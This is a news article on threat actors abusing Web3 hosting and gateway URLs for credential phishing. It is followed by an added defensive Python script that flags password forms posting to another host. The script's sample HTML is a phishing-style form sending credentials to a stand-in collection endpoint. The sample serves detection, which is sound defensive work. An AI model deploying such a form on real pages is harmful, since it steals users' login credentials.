Source: news.google.com
Web3 platforms have risen in popularity over the years and continue to grab headlines with multi-billion dollar investments as well as major downturns. According to McKinsey, despite early funding issues, Web3 application adoption has occurred at an exponential rate, leading many industry professionals to question how secure and stable these platforms are.
Web3 platforms are designed to make content hosting more available to people, bypass censorship, ensure access to published content, and avoid technical issues like server administration, which makes these platforms attractive to threat actors seeking to host malicious content.
By analyzing the credential phishing campaigns that hit inboxes during the first three quarters of 2022, Cofense discovered a significant increase in the abuse of Web3 platforms for phishing. As a result, phishing campaigns abusing Web3 platforms have increased by 482% in 2022, with credential phishing accounting for the majority of abuse.
How Web3 is exploited by threat actors
Web3 platforms require the creation of a network of many different servers working together to host content. Not all web browsers support direct access to these platforms. To make Web3 services more usable, some organizations run servers that produce “Gateway URLs,” which allow browsers to open Web3 content as if it were hosted on a traditional server.
Gateway services help in the adoption of Web3 technologies by making them more accessible. However, these services are used by threat actors to send links to phishing pages that they host on Web3 platforms. Services can choose to disable a gateway URL that points to malicious or illegal content, but the effort becomes a cat-and-mouse game, as threat actors can simply republish their content with new gateway URLs.
Why Web3 is an attractive target
Web3 platforms do not have organized moderators to manage hosted content. While some measures are in place to limit malicious content, it is impossible to prevent it from being hosted within the platforms or to remove it once it has been hosted. Web3 platforms are readily available to any user with relevant software and the content is hosted collaboratively by users of the platforms.
The most common tactics used by threat actors when exploiting Web3 platforms using malicious URLs can be divided into two stages. Stage 1 includes embedded URLs in the email. Only 21 percent of Web3 URLs are used in stage 1, as they are easier for organizations to identify and block. Stage 2 involves any URLs that open after users have opened the link embedded in the email.
Since content posted to Web3 platforms is considered permanent, this eliminates the need for threat actors to create or steal accounts, compromise websites, or register new domains to host a credential phishing page. Threat actors can continually publish new phishing pages to get ahead of countermeasures.
Although Web3 platforms are an attractive host for threat actors, these platforms cannot perform data exfiltration. Instead, threat actors must maintain more traditional compromised or malicious servers as endpoints to receive stolen credentials. They often use HTML forms or embedded JavaScript code so that the victim’s browser sends the captured login credentials to endpoints under the control of the threat actor.
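One way a defender could check a captured page for the pattern described above, as an added example that is not from the article or from Cofense: it parses the HTML and flags any form with a password field whose action resolves to a different host than the page itself. The hostnames `gateway.example` and `collector.example`, the class and function names, and the sample page are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class FormAudit(HTMLParser):
    """Record each <form> action and whether the form holds a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []  # one dict per <form>, in document order

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append({"action": a.get("action") or "", "password": False, "open": True})
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            # Attribute the field to the most recent form only while it is still open.
            if self.forms and self.forms[-1]["open"]:
                self.forms[-1]["password"] = True

    def handle_endtag(self, tag):
        if tag == "form" and self.forms:
            self.forms[-1]["open"] = False


def offsite_credential_forms(page_url, html):
    """Return absolute action URLs of password forms that post to another host."""
    parser = FormAudit()
    parser.feed(html)
    parser.close()
    page_host = urlsplit(page_url).hostname
    hits = []
    for form in parser.forms:
        target = urljoin(page_url, form["action"])  # empty action resolves to the page
        if form["password"] and urlsplit(target).hostname != page_host:
            hits.append(target)
    return hits


# Constructed sample: placeholder gateway host and collection endpoint.
PAGE_URL = "https://gateway.example/content/PLACEHOLDER_ID/index.html"
SAMPLE = """
<form action="/search"><input type="text" name="q"></form>
<form method="post" action="https://collector.example/save.php">
  <input type="email" name="user"><input type="password" name="pass">
</form>
"""

if __name__ == "__main__":
    print(offsite_credential_forms(PAGE_URL, SAMPLE))
```

This covers only the HTML form case; credentials sent by embedded JavaScript need script analysis or network capture instead.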
Web3 Outlook 2023
Forrester stated in its trend report “Web3 promises a better online future but contains the seeds of a dystopian nightmare” that CIOs, CMOs and other executives should approach Web3 with extreme caution, even as investment in Web3 technologies continues to skyrocket.
As Web3 technology gains adoption in the daily lives of users and organizations, the opportunity for abuse will only grow. The decentralized nature of these platforms puts the responsibility for security in the hands of individuals, and as Web3 platforms increase in popularity, threat actors will continue to take advantage of this opportunity, so it is essential that users stay informed and vigilant to prevent exploitation via Web3 phishing threats.
Author of the photo: wk1003mike / Shutterstock
Brad Haas is a Threat Intelligence Analyst, Cofense.